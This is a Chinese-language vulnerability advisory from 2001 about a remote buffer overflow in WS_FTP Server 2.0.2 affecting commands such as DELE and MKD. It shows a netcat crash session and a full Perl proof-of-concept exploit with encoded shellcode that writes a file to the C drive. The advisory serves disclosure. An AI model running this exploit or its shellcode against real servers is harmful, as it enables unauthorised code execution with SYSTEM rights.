WS_FTP Server 存在缓冲溢出发布时间:2001-07-27 更新时间:2001-07-27 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 WS_FTP Server version 2.0.2详细描述 WS_FTP Server 是FTP服务程序,可使用于WINDOWS NT/2000,其中 下面命令存在缓冲溢出漏洞: * DELE * MDTM * MLST * MKD * RMD * RNFR * RNTO * SIZE * STAT * XMKD * XRMD 如果溢出成功可以以SYSTEM的权利执行任意代码。一般只要对命令 递交多于478字节参数,就可以EIP被改写。 C:\tools\web>nc -nvv 127.0.0.1 21 (UNKNOWN) [127.0.0.1] 21 (?) open 220-helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520) 220-Tue Jun 19 14:00:21 2001 220-30 days remaining on evaluation. 220 helig2 X2 WS_FTP Server 2.0.2.EVAL (48732520) user ftp 331 Password required pass ftp 230 user logged in DELE AAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA Access violation - code c0000005 (first chance) eax=000000ea ebx=0067c278 ecx=000000ea edx=00000002 esi=0067c278 edi=77fca3e0 eip=41414141 esp=0104df88 ebp=41414141 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010246 测试代码 #!/usr/local/bin/perl ############################################################## # # WS_FTP Server 2.0.2 DELE proof-of-concept exploit # By andreas@defcom.com and janne@defcom.com (C)2001 # ############################################################## $login="ftp"; #username $pass="ftp"; #password ############################################################## $ARGC=@ARGV; if ($ARGC !=1) { print "WS_FTP server 2.0.2 DELE proof-of-concept exploit\n"; print "It creates a file named defcom.iyd in the c-root\n"; print "(C)2001 andreas\@defcom.com\n"; print "Usage: $0 <host>\n"; print "Example: $0 127.0.0.1\n"; exit; } use Socket; my($remote,$port,$iaddr,$paddr,$proto); $remote=$ARGV[0]; $port = "21"; $iaddr = inet_aton($remote) or die "Error: $!"; $paddr = sockaddr_in($port, $iaddr) or die "Error: $!"; $proto = getprotobyname('tcp') or die "Error: $!"; socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "Error: $!"; connect(SOCK, $paddr) or die "Error: $!"; sleep(1); $msg = "user $login\n"; send(SOCK, $msg, 0) or die "Cannot send query: $!"; $msg = "pass $pass\n"; sleep(1); send(SOCK, $msg, 0) or die "Cannot send query: $!"; $sploit = "\x8b\xd8\x8b\xf8\x83\xc0\x18\x33\xc9\x66\xb9\x42\x81\x66\x81\xf1\x80\x80\x80\x30\x95\x40\xe2\xfa\xde\x1e\x76"; $sploit = $sploit . "\x1e\x7e\x2e\x95\x6f\x95\x95\xc6\xfd\xd5\x95\x95\x95\x2b\x49\x81\xd0\x95\x6a\x83\x96\x56\x1e\x75\x1e\x7d\xa6\x55"; $sploit = $sploit . "\xc5\xfd\x15\x95\x95\x95\xff\x97\xc5\xc5\xfd\x95\x95\x95\x85\x14\x52\x59\x94\x95\x95\xc2\x2b\xb1\x80\xd0\x95"; $sploit = $sploit . "\x6a\x83\xc5\x2b\x6d\x81\xd0\x95\x6a\x83\xa6\x55\xc5\x2b\x85\x83\xd0\x95\x6a\x83"; $msg = "dele " . $sploit . "\xd4" x (460-length($sploit)) . "\xf6\xaf\xc9\xf1\xf0\xf3\xf6\xfa\xf8\xbb\xfc\xec\xf1\x95"; $msg = $msg . "\xab\xa3\x54\x77" . "\xd4" x 16 . "\x8b\xc4\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x7f\x83\xe8\x71\xff\xe0\n"; print $msg; sleep(1); send(SOCK, $msg, 0) or die "Cannot send query: $!"; exit; 解决方案 尚无 相关信息 andreas at defcom.com |
